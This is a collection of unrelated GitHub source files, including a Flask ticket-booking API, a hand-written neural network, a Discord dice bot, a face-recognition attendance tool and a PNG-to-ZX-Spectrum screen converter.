+{"seq_id":"21934791649","text":"from flask_restful import Resource, Api\nfrom flask_restful import fields, marshal_with\nfrom flask_restful import reqparse\nfrom flask import make_response , jsonify\nfrom application.database import db\nfrom application.models import Theatre , Show , Booking , User\nfrom flask import current_app as app\nfrom datetime import datetime\n\nfrom flask_jwt_extended import jwt_required, get_jwt_identity ######\nfrom traceback import print_exc\nfrom flask_restful import abort\nfrom application.helpers import admin_required\n\nimport application.data_access as da\nfrom time import perf_counter_ns\n\nfrom werkzeug.exceptions import HTTPException\n\nbooking_fields = {\n 'id': fields.Integer,\n 'show_id': fields.Integer,\n 'user_id': fields.Integer,\n 'booking_time': fields.String, # We'll format the datetime for output\n 'seats': fields.Integer,\n 'user_rating': fields.Integer\n}\n\n# Define the request parser for POST method\nbooking_parser = reqparse.RequestParser()\n#booking_parser.add_argument('show_id', type=int, required=True)\n#booking_parser.add_argument('user_id', type=int, required=True)\nbooking_parser.add_argument('seats', type=int, required=True)\n#booking_parser.add_argument('user_rating', type=int)\n\nupdate_booking_parser = reqparse.RequestParser()\nupdate_booking_parser.add_argument('user_rating', type=int , help='rating must be between 1 - 5')\n\n\n#get method for shows of particular user\n\nclass UserBookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def get(self):\n user_id = get_jwt_identity() ###### \n user = User.query.get(user_id)\n if not user:\n abort(404 , description=\"User not found\")\n else:\n start = perf_counter_ns()\n user_bookings = da.get_bookings_by_user_id(user_id)\n stop = perf_counter_ns()\n print(\"time taken :\" , stop - start)\n return user_bookings , 200\n \n \n \nclass AllBookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def get(self):\n bookings = Booking.query.all() ###### \n return bookings , 200\n \n \n# GET method for new booking\n\nclass BookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def post(self,show_id):\n #try:\n user_id = get_jwt_identity() ######\n args = booking_parser.parse_args()\n \n if not (User.query.get(user_id)):\n abort(404 , description=\"User not found\")\n \n show = Show.query.get(show_id)\n #show = da.get_show_by_show_id(show_id)\n if not show:\n abort(404, description=\"Show not found\")\n \n if show.show_capacity == 0 :\n abort(403 , description=\"Housefull!\")\n elif show.show_capacity < args['seats']:\n abort(403 , description=\"Enough seats not available!\")\n else:\n show.show_capacity = show.show_capacity - args['seats']\n \n booking = Booking(show_id=show_id,user_id=user_id, booking_time=datetime.now() , seats = args['seats'] , user_rating = 0)\n db.session.add(booking)\n db.session.commit()\n da.cache.delete_memoized(da.get_bookings_by_user_id , user_id)\n da.cache.delete_memoized(da.get_shows_by_theatreid , show.theatre_id)\n return booking\n \n \n\nclass UpdateBookingAPI(Resource):\n @marshal_with(booking_fields)\n @jwt_required()\n def put(self, id):\n user_id = get_jwt_identity()\n booking = Booking.query.get(id)\n if not booking:\n abort(404 , description=\"Booking not found\")\n\n args = update_booking_parser.parse_args()\n \n # Update user_rating if provided\n if 'user_rating' in args:\n booking.user_rating = args['user_rating']\n\n # Update the average rating for the show\n bookings = Booking.query.filter_by(show_id=booking.show_id).all()\n show = Show.query.get(booking.show_id)\n\n if not bookings:\n #show = Show.query.get(booking.show_id)\n show.rating =0.0\n else:\n total_rating = sum(booking.user_rating for booking in bookings)\n average_rating = total_rating / len(bookings)\n\n #show = Show.query.get(booking.show_id)\n show.rating = average_rating\n\n db.session.commit()\n da.cache.delete_memoized(da.get_bookings_by_user_id , user_id)\n da.cache.delete_memoized(da.get_shows_by_theatreid , show.theatre_id)\n \n\n return booking \n\n\n","repo_name":"jasleen9/XenonStack","sub_path":"ticketshow/application/controllers/api/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34262633938","text":"def binarySearch(arr, val):\n\tlo = 0\n\thi = len(arr)-1\n\tctr = 0\n\tmid = int((lo + hi)/2)\n\tcurrent = arr[mid]\n\tarr.sort() #sort values into numerical order in case they aren't already\n\n\n\t\t\n\twhile val != arr[mid]:\n\t\tif val > arr[mid]:\n\t\t\tctr = ctr + 1\n\t\t\tprint (arr[mid])\n\t\t\tmid = int((mid + hi)/2)\n\t\t\tif valarr[mid-1]: #do this if value is in between to table values.\n\t\t\t\tprint (\"Value not in table\")\n\t\t\tif val>arr[-2]: #so we can test if value is last number in array\n\t\t\t\tif val == arr[-1]:\n\t\t\t\t\tmid=-1\n\t\t\t\telse:\n\t\t\t\t\tprint (\"Value not in table\")\n\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\tif val < arr[mid]:\n\t\t\tctr = ctr +1\n\t\t\tprint (arr[mid])\n\t\t\tmid = int((mid +lo)/2)\n\t\t\tif valarr[mid-1]: #do this if value is in between to table values but not in table.\n\t\t\t\tprint (\"Value not in table\")\n\t\t\tif val layer specification for the FF network in list form (eg. [5 3 3 2])\r\n\t\t:param learning_rate: learning rate of the network (C)\r\n\t\t:param momentum: momentum parameter (alpha)\r\n\t\t\"\"\"\r\n\t\tself.c = learning_rate\r\n\t\tself.alpha = momentum\r\n\t\tself.num_inputs = layers[0]\r\n\t\tself.num_outputs = layers[-1]\r\n\t\tself.num_layers = len(layers)\r\n\r\n\t\tself.weights = []\r\n\t\tself.biases = []\r\n\r\n\t\tfor i in range(1, self.num_layers):\r\n\t\t\tprev_outputs = layers[i-1]\r\n\t\t\tinit_parameter = 1.0 / prev_outputs\r\n\r\n\t\t\t# initialize n x m weight matrix using uniform initialization, each row is a node's input weights\r\n\t\t\tweight_mtx = np.random.uniform(-init_parameter, init_parameter, size=(layers[i], prev_outputs)) \r\n\r\n\t\t\t# n x 1 bias vector, each row is a node's bias\r\n\t\t\tbias_vector = np.zeros((layers[i], 1))\t\r\n\r\n\t\t\tself.weights.append(weight_mtx)\r\n\t\t\tself.biases.append(bias_vector)\r\n\r\n\r\n\tdef one_hot(self, d):\r\n\t\t\"\"\"transforms a numeric label into one-hot column vector\"\"\"\r\n\t\ty = np.zeros((self.num_outputs, 1))\r\n\t\ty[d] = 1\r\n\t\treturn y\r\n\r\n\r\n\tdef train(self, train_X, train_D, val_X=None, val_D=None, num_epochs=1):\r\n\t\t\"\"\"\r\n\t\ttrain the classifier, return list of validation accuracy per epoch\r\n\r\n\t\t:param train_X: feature matrix of training set\r\n\t\t:param trian_D: list of labels for supervised learning\r\n\t\t:param val_X: feature matrix of validation set\r\n\t\t:param val_D: label array for validation\r\n\t\t:param num_epochs: iterations over the training set\r\n\t\t\"\"\"\r\n\t\t# First convert training labels to one hot vectors\r\n\t\ttrain_Y = list(map(self.one_hot, train_D))\r\n\t\taccuracies = []\r\n\r\n\t\tfor epoch in range(num_epochs):\r\n\r\n\t\t\tfor x, y in zip(train_X, train_Y):\r\n\t\t\t\tself.update_SGD(x.reshape(1, self.num_inputs), y)\r\n\r\n\t\t\tif val_X is not None and val_D is not None:\r\n\t\t\t\tpredictions = self.test(val_X)\r\n\t\t\t\taccuracies.append(accuracy_score(val_D, predictions))\r\n\r\n\t\treturn accuracies\r\n\r\n\r\n\tdef test(self, test_X):\r\n\t\t\"\"\"return predicted labels for feature set\"\"\"\r\n\t\treturn list(map(self.predict, test_X))\r\n\r\n\r\n\tdef update_SGD(self, x, y):\r\n\t\t\"\"\"\r\n\t\tApplies a single step of stochastic gradient descent\r\n\r\n\t\t:param x: 1 x m feature vector from dataset\r\n\t\t:param y: one-hot target vector indicating desired label\r\n\t\t\"\"\"\r\n\t\tdel_w, del_b = self.backpropogate(x, y)\r\n\t\tself.weights = [w - self.c * dw + self.alpha * w for w, dw in zip(self.weights, del_w)]\r\n\t\tself.biases = [b - self.c * db + self.alpha * b for b, db in zip(self.biases, del_b)]\r\n\r\n\t\treturn None\r\n\r\n\r\n\tdef predict(self, x):\r\n\t\t\"\"\"\r\n\t\tgenerate a predicted label given feature vector x\r\n\t\t\"\"\"\r\n\t\tactivation = x.reshape(1, self.num_inputs).T\r\n\t\tfor w, b in zip(self.weights, self.biases):\r\n\t\t\tz = np.dot(w, activation) + b \r\n\t\t\tactivation = sigmoid(z)\r\n\r\n\t\treturn np.argmax(activation)\r\n\r\n\r\n\tdef backpropogate(self, x, y):\r\n\t\t\"\"\"\r\n\t\tApply the backpropogation algorithm to generate the deltas for weights\r\n\t\tand biases in each layer\r\n\r\n\t\t:param x: 1 x m feature vector from dataset\r\n\t\t:param y: one-hot target vector indicating desired label\r\n\t\t\"\"\"\r\n\t\t# These will hold the gradient of the cost function with respect to\r\n\t\t# weights and biases\r\n\t\tdel_w = [np.zeros(w.shape) for w in self.weights]\r\n\t\tdel_b = [np.zeros(b.shape) for b in self.biases]\r\n\r\n\t\t# Forward pass through the network\r\n\t\tactivation = x.T\r\n\t\tactivations = [activation]\r\n\t\tnet_inputs = []\r\n\r\n\t\tfor w, b in zip(self.weights, self.biases):\r\n\t\t\tz = np.dot(w, activation) + b\r\n\t\t\tnet_inputs.append(z)\r\n\t\t\tactivation = sigmoid(z)\r\n\t\t\tactivations.append(activation)\r\n\r\n\t\t# Error at output layer\r\n\t\toutput = self.one_hot(np.argmax(activations[-1]))\r\n\t\tdelta = self.cost_derivative(output, y) * sigmoid_prime(net_inputs[-1]) #dC/dz at output\r\n\t\tdel_b[-1] = delta #dC/db = dC/dz\r\n\t\tdel_w[-1] = np.dot(delta, activations[-2].T)\r\n\r\n\t\t# propogate error backwards layer by layer\r\n\t\tfor l in range(2, self.num_layers):\r\n\t\t\tz = net_inputs[-l]\r\n\t\t\tdelta = np.dot(self.weights[-l+1].T, delta) * sigmoid_prime(z)\r\n\t\t\tdel_b[-l] = delta\r\n\t\t\tdel_w[-l] = np.dot(delta, activations[-l-1].T)\r\n\r\n\t\treturn (del_w, del_b)\r\n\r\n\r\n\t@staticmethod\r\n\tdef cost_function(output_activations, y):\r\n\t\t\"\"\"use 1/2 of the square error as the cost function\"\"\"\r\n\t\treturn (1/2) * (y - output_activations) ** 2\r\n\r\n\t@staticmethod\r\n\tdef cost_derivative(output_activations, y):\r\n\t\t\"\"\"derivative of the L2 cost function with respect to network output\"\"\"\r\n\t\treturn (output_activations - y)\r\n\r\n\r\ndef sigmoid(z):\r\n\t\"\"\"\r\n\tThe sigmoid function\r\n\t\"\"\"\r\n\tz = np.clip(z, -500, 500)\r\n\treturn 1.0 / (1.0 + np.exp(-z))\r\n\r\ndef sigmoid_prime(z):\r\n\t\"\"\"\r\n\tderivative of the sigmoid function\r\n\t\"\"\"\r\n\treturn sigmoid(z) * (1 - sigmoid(z))\r\n","repo_name":"ben-the-hedgehog/backprop-network","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70467895260","text":"# -*- coding: utf-8 -*-\n\n\ndef createArnoldTextureSettings():\n \"\"\"The patched version of the original file\"\"\"\n import pymel.core as pm\n import maya.cmds as cmds\n import pymel.versions as versions\n from mtoa.ui.globals import settings\n\n pm.setUITemplate(\"attributeEditorTemplate\", pushTemplate=True)\n pm.columnLayout(adjustableColumn=True)\n\n pm.attrControlGrp(\n \"autotx\",\n cc=settings.updateAutoTxSettings,\n label=\"Auto-convert Textures to TX (Disabled in Anima)\",\n attribute=\"defaultArnoldRenderOptions.autotx\",\n enable=False,\n )\n\n pm.attrControlGrp(\n \"use_existing_tiled_textures\",\n label=\"Use Existing TX Textures\",\n attribute=\"defaultArnoldRenderOptions.use_existing_tiled_textures\",\n )\n\n # disable autotx\n pm.setAttr(\"defaultArnoldRenderOptions.autotx\", 0)\n settings.updateAutoTxSettings()\n cmds.separator()\n\n # don't create texture_automip for 2017 as autoTx is ON by default\n maya_version = versions.shortName()\n if int(float(maya_version)) < 2017:\n pm.attrControlGrp(\n \"texture_automip\",\n label=\"Auto-mipmap\",\n attribute=\"defaultArnoldRenderOptions.textureAutomip\",\n )\n\n pm.attrControlGrp(\n \"texture_accept_unmipped\",\n label=\"Accept Unmipped\",\n attribute=\"defaultArnoldRenderOptions.textureAcceptUnmipped\",\n )\n\n cmds.separator()\n\n pm.checkBoxGrp(\n \"ts_autotile\", cc=settings.updateAutotileSettings, label=\"\", label1=\"Auto-tile\"\n )\n\n pm.connectControl(\"ts_autotile\", \"defaultArnoldRenderOptions.autotile\", index=2)\n\n pm.intSliderGrp(\n \"ts_texture_autotile\",\n label=\"Tile Size\",\n minValue=16,\n maxValue=64,\n fieldMinValue=16,\n fieldMaxValue=1024,\n )\n\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=1\n )\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=2\n )\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=3\n )\n\n \"\"\"pm.attrControlGrp('texture_autotile',\n label=\"Auto-tile Size\",\n attribute='defaultArnoldRenderOptions.textureAutotile')\"\"\"\n\n pm.attrControlGrp(\n \"texture_accept_untiled\",\n label=\"Accept Untiled\",\n attribute=\"defaultArnoldRenderOptions.textureAcceptUntiled\",\n )\n\n pm.attrControlGrp(\n \"texture_max_memory_MB\",\n label=\"Max Cache Size (MB)\",\n attribute=\"defaultArnoldRenderOptions.textureMaxMemoryMB\",\n )\n\n pm.attrControlGrp(\n \"texture_max_open_files\",\n label=\"Max Open Files\",\n attribute=\"defaultArnoldRenderOptions.textureMaxOpenFiles\",\n )\n\n cmds.separator()\n\n cmds.attrControlGrp(\n \"texture_diffuse_blur\",\n label=\"Diffuse Blur\",\n attribute=\"defaultArnoldRenderOptions.textureDiffuseBlur\",\n )\n\n # cmds.attrControlGrp('texture_glossy_blur',\n # label=\"Glossy Blur\",\n # attribute='defaultArnoldRenderOptions.textureGlossyBlur')\n\n pm.setParent(\"..\")\n\n pm.setUITemplate(popTemplate=True)\n","repo_name":"eoyilmaz/anima","sub_path":"anima/dcc/mayaEnv/config/arnold_patches.py","file_name":"arnold_patches.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"69"}
+{"seq_id":"21412111324","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom data_module import data\nimport json\n\n\n\"\"\"\najax测试服务器\n\"\"\"\n\n\napp = Flask(__name__)\nCORS(app=app)\nport = 8001 # 配置端口\n\n\n@app.route(\"/\", methods=['post', 'get'])\ndef index():\n return \"hello world!\"\n\n\n@app.route(\"/\", methods=['post', 'get'])\ndef common_func(key):\n values = data.get(key)\n mes = {\"message\": \"success\"}\n if values is None:\n mes['message'] = \"not found!\"\n else:\n mes['data'] = values\n print(mes)\n return json.dumps(mes)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=port, debug=True, threaded=True)\n","repo_name":"SYYDSN/py_projects","sub_path":"tools_box/ajax_server.py","file_name":"ajax_server.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23611347604","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Dice:\n max_die = 20\n\n help_str = '''\\\nx refers to the number of dice to roll\n\nx is an optional argument and when omitted will default to one\n\ny refers to the type of dice to roll\n\nOmitting the xdy argument defaults to rolling one d20\n\nMax number of rollable dice is {max_die}\n\nThe available types of die are d3, d4, d5, d6, d8, d10, and d20\n'''.format(max_die=max_die)\n\n available_die = [3, 4, 5, 6, 8, 10, 20, 100]\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='roll', help=help_str, brief='Roll some dice', aliases=['dice', 'r'])\n async def roll(self, xdy : str = '1d20'):\n try:\n num_dice, limit = xdy.split('d')\n if not num_dice:\n num_dice = 1\n else:\n num_dice = int(num_dice)\n limit = int(limit)\n except Exception as e:\n await self.bot.say('Invalid usage. Expected !roll xdy')\n else:\n if num_dice > Dice.max_die:\n await self.bot.say('The max number of die you can roll is {max_die}'.format(max_die=Dice.max_die))\n elif limit not in Dice.available_die:\n await self.bot.say('Invalid dice type')\n else:\n rolls = [random.randint(1, limit) for r in range(num_dice)]\n await self.bot.say('`[' + ']['.join(map(str, rolls)) + '] = ' + str(sum(rolls)) + '`')\n\n @roll.error\n async def roll_error(self, error, ctx):\n if isinstance(error, commands.BadArgument) or isinstance(error, commands.MissingRequiredArgument):\n await self.bot.say(error)\n\ndef setup(bot):\n bot.add_cog(Dice(bot))\n","repo_name":"Tharinis18/Dumbass-Bot","sub_path":"cogs/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2674660769","text":"import json\nimport logging\nimport random\nimport os\n\nfrom nni.retiarii import Model, submit_models, wait_models\nfrom nni.retiarii.strategy import BaseStrategy\nfrom nni.retiarii import Sampler\n\n\n_logger = logging.getLogger(__name__)\n\nclass RandomSampler(Sampler):\n def choice(self, candidates, mutator, model, index):\n return random.choice(candidates)\n\nclass SimpleStrategy(BaseStrategy):\n def __init__(self):\n self.name = ''\n\n def run(self, base_model, applied_mutators, trainer):\n try:\n _logger.info('stargety start...')\n while True:\n model = base_model\n _logger.info('apply mutators...')\n _logger.info('mutators: {}'.format(applied_mutators))\n random_sampler = RandomSampler()\n for mutator in applied_mutators:\n _logger.info('mutate model...')\n mutator.bind_sampler(random_sampler)\n model = mutator.apply(model)\n # get and apply training approach\n _logger.info('apply training approach...')\n model.apply_trainer(trainer['modulename'], trainer['args'])\n # run models\n submit_models(model)\n wait_models(model)\n _logger.info('Strategy says:', model.metric)\n except Exception as e:\n _logger.error(logging.exception('message'))\n","repo_name":"luckygirlfyh/ConSK-GCN","sub_path":"Model/ConSK-GCN_MELD/nni-master/nni-master/test/retiarii_test/simple_strategy.py","file_name":"simple_strategy.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"1876997642","text":"import AuthenticationServices\nfrom PyObjCTools.TestSupport import TestCase, min_os_level\n\n\nclass TestASAuthorizationProviderExtensionAuthorizationRequest(TestCase):\n @min_os_level(\"11.0\")\n def test_constants11_0(self):\n self.assertIsInstance(\n AuthenticationServices.ASAuthorizationProviderAuthorizationOperationConfigurationRemoved,\n str,\n )\n\n @min_os_level(\"13.0\")\n def test_constants13_0(self):\n self.assertIsInstance(\n AuthenticationServices.ASAuthorizationProviderAuthorizationOperationDirectRequest,\n str,\n )\n\n @min_os_level(\"11.0\")\n def test_methods11_0(self):\n self.assertResultIsBOOL(\n AuthenticationServices.ASAuthorizationProviderExtensionAuthorizationRequest.isCallerManaged\n )\n\n @min_os_level(\"12.3\")\n def test_methods12_3(self):\n self.assertResultIsBOOL(\n AuthenticationServices.ASAuthorizationProviderExtensionAuthorizationRequest.isUserInterfaceEnabled\n )\n","repo_name":"ronaldoussoren/pyobjc","sub_path":"pyobjc-framework-authenticationservices/pyobjctest/test_asauthorizationproviderextensionauthorizationrequest.py","file_name":"test_asauthorizationproviderextensionauthorizationrequest.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"69"}
+{"seq_id":"1423132890","text":"import matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.family'] = 'montserrat'\nfig, ax = plt.subplots()\ndata = []\n#d = float(input('ведите частоту отображений маркеров: '))\n# Запись данных из файлов\nwith open('data.txt', 'r') as f:\n data = list(map(int, f.readlines()))\nwith open('settings.txt', 'r') as f:\n ch_disc = float(f.readline())\n shag_kvant = float(f.readline())\n zar_time = round(float(f.readline()), 2)\n raz_time = round(float(f.readline()), 2)\nall_time = zar_time + raz_time\n\n'''if d != 1:\n ost = int(len(data) * d)\n ybr = len(data) - ost\n sh = int(len(data) / ybr)\n print(sh)\n print(ost)\n print(ybr)\n i = sh\n while i < len(data):\n data.pop(i)\n print(data)\n i += sh\n'''\n\nif data != []:\n # Построение графика\n x = [i * all_time / len(data) for i in range(len(data))]\n y = [i / 256 * 3.3 for i in data]\n plt.plot(x, y, c='blue', label='V(t)', linewidth=2 )\n plt.scatter(x, y, s=25, c='blue', marker='o')\n plt.xlabel('Время, с', fontsize=20)\n plt.ylabel('Напряжение, В', fontsize=20)\n ax.minorticks_on()\n ax.grid(True, which='both')\n ax.grid(which='major', color='k', linewidth=1)\n ax.grid(which='minor', color='k', linestyle=':')\n plt.title('Процесс заряда и разряда конденсатора в RC-цепочке ', fontsize=33, wrap=True, pad=20)\n plt.legend(loc = 'upper right', ncol=20, prop={'size': 30})\n plt.axis([round(min(x), 1), round(max(x), 1), round(min(y), 1), round(max(y), 1)])\n ax.text(40, 2, 'Время заряда = {} с \\n\\nВремя разряда = {} с'.format(zar_time, raz_time), fontsize=20)\n plt.show()\n\n\n","repo_name":"MordvinovaA/get","sub_path":"graf-7.1.py","file_name":"graf-7.1.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7059562521","text":"import tkinter as tk\nimport cv2\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom Recognition.FaceRecognition import FaceRecognition\nfrom Model.Account import Account\nfrom View.FaceListFrame import FaceListFrame\nfrom View.MyVideoCapture import MyVideoCapture\nfrom Model.AttendanceLog import AttendanceLog\nimport config\nimport threading\n\n\nclass UI:\n def __init__(self, window, windowTitle, videoSource=0):\n self.window = window\n self.window.title(windowTitle)\n self.videoSource = videoSource\n self.data = UI.getData()\n\n self.frameToShow = None\n self.frameToPredict = None\n self.photo = None\n self.net = cv2.dnn.readNetFromCaffe(\"Recognition/face_detector/deploy.prototxt\",\n \"Recognition/face_detector/res10_300x300_ssd_iter_140000.caffemodel\")\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n self.vid = MyVideoCapture(videoSource)\n self.canvas = tk.Canvas(window, width=self.vid.width, height=self.vid.height)\n self.canvas.pack()\n self.faceFrame = FaceListFrame(self.window)\n self.canvasFaces = self.faceFrame.canvasFaces\n self.nameLabels = self.faceFrame.nameLabels\n\n self.faces = []\n self.labels = []\n self.delay = 20\n self.predictThread = threading.Thread(target=self.predict)\n # self.showThread = threading.Thread(target=self.updateFrame)\n self.predictThread.start()\n self.updateFrame()\n self.window.mainloop()\n\n @staticmethod\n def getData():\n Account.update(\"\")\n dicts = Account.getFaces()\n return dicts\n\n def updateFrame(self): \n if self.frameToShow is not None:\n self.photo = ImageTk.PhotoImage(image=Image.fromarray(self.frameToShow))\n self.canvas.create_image(0, 0, image=self.photo, anchor=tk.NW)\n\n for i in range(len(self.faces)):\n self.canvasFaces[i].create_image(90, 90, image=self.faces[i])\n self.nameLabels[i].config(text=str(self.labels[i]))\n\n self.window.after(self.delay, self.updateFrame)\n\n def predict(self):\n while True:\n ret, frame = self.vid.getFrame()\n self.frameToPredict = frame\n bboxes = self.detectFace(self.frameToPredict)\n print(len(bboxes))\n listLabels = FaceRecognition.predictLabels(bboxes, self.data, self.frameToPredict)\n self.frameToShow= self.frameToPredict\n for i in range(len(bboxes)):\n box = bboxes[i]\n (startX, startY, endX, endY) = box\n self.frameToShow = cv2.rectangle(self.frameToShow, (startX, startY), (endX, endY), (0, 255, 0), 2)\n face = self.frameToPredict[startY:endY, startX:endX]\n studentId = ''\n if listLabels[i] == config.STRANGER_LABEL:\n name = config.STRANGER_LABEL\n else:\n name, studentId = FaceRecognition.getIdName(listLabels[i])\n\n print(i, name)\n if face.shape[0] > 100 and name != config.STRANGER_LABEL and name not in self.labels:\n self.faces.append(ImageTk.PhotoImage(image=Image.fromarray(cv2.resize(face, (150, 200)))))\n self.labels.append(name)\n UI.saveAttendanceRecord(face, studentId, name)\n\n if len(self.faces) > config.NUM_FACES:\n self.faces.pop(0)\n self.labels.pop(0)\n \n\n @staticmethod\n def saveAttendanceRecord(face, studentId, name):\n path = FaceRecognition.saveFace(face, studentId, config.IMAGE_FOLDER)\n AttendanceLog.save(studentId, path)\n FaceRecognition.voice(name, config.SOUND_FOLDER)\n AttendanceLog.send()\n\n def detectFace(self, frame):\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,\n (300, 300), (104.0, 177.0, 123.0))\n # Phat hien khuon mat\n self.net.setInput(blob)\n detections = self.net.forward()\n listBbox = []\n # listFaces = []\n # Loop qua cac khuon mat\n for i in range(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n\n # Neu conf lon hon threshold\n if confidence > 0.75:\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n listBbox.append(box.astype(\"int\"))\n\n return listBbox\n\n","repo_name":"fancoltran/facerecognizer","sub_path":"View/UIMultithread.py","file_name":"UIMultithread.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5518383394","text":"#!/usr/bin/env python3\n#\n# script -c \"./t48a.py\" /dev/null | ./t48b.py\n#\n\nimport time\nimport random\n\ndef output():\n for i in range(15):\n print(random.randint(1, 101))\n time.sleep(3)\n\nif __name__ == \"__main__\":\n output()\n","repo_name":"ckatsak/junkcode","sub_path":"t048/t48a.py","file_name":"t48a.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22865679671","text":"__version__ = \"1.0.3\"\n\nfrom argparse import ArgumentParser\nfrom PIL import Image\n\nCOLORS = ( (0, 0, 0),\n (0, 0, 205), (0, 0, 255),\n (205, 0, 0), (255, 0, 0),\n (205, 0, 205), (255, 0, 255),\n (0, 205, 0), (0, 255, 0),\n (0, 205, 205), (0, 255, 255),\n (205, 205, 0), (255, 255, 0),\n (205, 205, 205), (255, 255, 255),\n )\n\nATTR_I = ( 0x00, 0x01, 0x01 | 0x40, 0x02, 0x02 | 0x40,\n 0x03, 0x03 | 0x40, 0x04, 0x04 | 0x40, 0x05, 0x05 | 0x40,\n 0x06, 0x06 | 0x40, 0x07, 0x07 | 0x40,)\n\nATTR_P = ( 0x00, 0x08, 0x08 | 0x40, 0x10, 0x10 | 0x40,\n 0x18, 0x18 | 0x40, 0x20, 0x20 | 0x40, 0x28, 0x28 | 0x40,\n 0x30, 0x30 | 0x40, 0x38, 0x38 | 0x40,)\n\nC2I = dict(zip(COLORS, ATTR_I))\nC2P = dict(zip(COLORS, ATTR_P))\n\nBASE = 128\n\ndef main():\n\n parser = ArgumentParser(description=\"PNG to Spectrum SCR converter\",\n epilog=\"Copyright (C) 2014-2016 Juan J Martinez \",\n )\n\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s \" + __version__)\n parser.add_argument(\"image\", help=\"image to convert\")\n\n args = parser.parse_args()\n\n try:\n image = Image.open(args.image)\n except IOError:\n parser.error(\"failed to open the image\")\n\n (w, h) = image.size\n\n if w != 256 or h != 192:\n parser.error(\"image size must be 256x192\")\n\n if not isinstance(image.getpixel((0, 0)), tuple):\n parse.error(\"only RGB(A) images are supported\")\n\n # so we support both RGB and RGBA images\n data = list(zip(list(image.getdata(0)), list(image.getdata(1)), list(image.getdata(2))))\n\n for c in data:\n if c not in COLORS:\n parser.error(\"invalid color %r in image\" % (c,))\n\n pixels = []\n attrib = []\n for y in range(0, h, 8):\n for x in range(0, w, 8):\n byte = []\n attr = []\n for j in range(8):\n row = 0\n for i in range(8):\n if not attr:\n attr.append(data[x + i + (j + y) * w])\n if data[x + i + (j + y) * w] != attr[0]:\n row |= 1 << (7 - i)\n if data[x + i + (j + y) * w] not in attr:\n attr.append(data[x + i + (j + y) * w])\n byte.append(row)\n\n if len(attr) > 2:\n parser.error(\"more than 2 colors in an attribute block in (%d, %d)\" % (x, y))\n elif len(attr) != 2:\n # if only one colour, try to find a match in an adjacent cell\n if attrib:\n prev_attr = attrib[-1]\n if prev_attr[0] == attr[0]:\n attr.append(prev_attr[1])\n if len(attr) != 2:\n attr.append(COLORS[0])\n\n # improve compression ratio\n if C2P[attr[0]] > C2I[attr[1]]:\n attr[0], attr[1] = attr[1], attr[0]\n byte = [~b & 0xff for b in byte]\n\n pixels.extend(byte)\n attrib.append(attr)\n\n attrib = [(C2P[attr[0]] | C2I[attr[1]]) for attr in attrib]\n\n interlaced = []\n for block in range(3):\n for col in range(8):\n for row in range(8):\n for line in range(32):\n interlaced.append(pixels[block * 8 * 8 * 32 \\\n + row * 32 * 8 \\\n + line * 8 \\\n + col])\n\n output = args.image + \".scr\"\n\n with open(output, \"wb\") as fh:\n fh.write(bytearray(interlaced))\n fh.write(bytearray(attrib))\n\n print(\"%r created\" % output)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"daad-adventure-writer/daad","sub_path":"Deprecated/TAPMAST/png2scr.py","file_name":"png2scr.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"69"}
